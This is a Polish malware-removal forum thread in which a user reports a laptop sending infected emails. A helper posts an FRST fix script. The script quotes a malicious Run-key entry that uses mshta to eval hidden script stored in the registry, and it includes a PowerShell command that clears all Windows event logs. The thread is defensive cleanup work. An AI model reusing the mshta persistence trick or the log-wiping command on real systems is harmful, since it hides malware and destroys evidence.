Skocz do zawartości

Wirus rozsyłający spam - wolne działanie laptopa


Rekomendowane odpowiedzi

Witam 

Mam problem z laptopem kuzynki  i jego dziwnym zachowaniem.  Otrzymałem informacje że mój komputer sam wysyła zainfekowane maile do innych użytkowników. W dodatku niepokoi mnie wolne działanie komputera.

W;logach zauważyłem pod montowane zainfekowane pendrive. Chrome zachowuje się bardzo dziwnie działa wolno w dodatku nie pokoi mnie ilość procesów chrome.  

Przesyłam log z FRST . 

Addition.txt FRST.txt Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
Cytat

W logach zauważyłem pod montowane zainfekowane pendrive.

Ja tego w logach nie widzę.

 

Cytat

nie pokoi mnie ilość procesów chrome

U mnie (tylko jeden profil, i otwarta tylko jedna strona) jest tych procesów 9.

 

Nie widzę tu żadnej infekcji.

 

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.
Otworzy się Notatnik - wklej do niego:

Spoiler

HKU\S-1-5-21-2909861356-222113022-3042124447-1000\...\Run: [cmicclen] => mshta "about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\50104E7A-6FA7-02AE-7984-1356BDF8 (dane wartości zawierają 51 znaków więcej). <==== UWAGA
HKU\S-1-5-21-2909861356-222113022-3042124447-1000\...\Policies\Explorer: []
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
FirewallRules: [{142EA57D-D6EC-495B-B51E-27B071207989}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Brak pliku
FirewallRules: [{2E599D9E-87D9-4A1B-B5D6-1134BDE57108}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Brak pliku
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S.
W FRST kliknij na Fix (NAPRAW).

 

jessi

Odnośnik do komentarza

Załączam plik po wykonaniu skryptu:

Z tego co widziałem  z powershella komenda się nie wykonała. 

Co do infekcji może tak być jak mówisz tylko chciałem mieć pewność. Bo z tego komputera były rozsyłane dziwne załączniki w mail. Które po otworzeniu zarażają trojanem będę miał dostęp do takiego komputera dzisiaj. Zamieszczę loga z tego drugiego komputera w nowym temacie. 

Natomiast wszystkie maile miały temat maila jako nazwę która zaznaczyłem w logu na czerwono:

HKLM\...\Drivers32: [msacm.l3acm] => C:\Windows\system32\l3codecp.acm [182272 2009-07-14] (Microsoft Windows -> Fraunhofer Institut Integrierte Schaltungen IIS)  

Postaram sie przekopiować treść maila bez załacznika.

 

Fixlog.txt

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...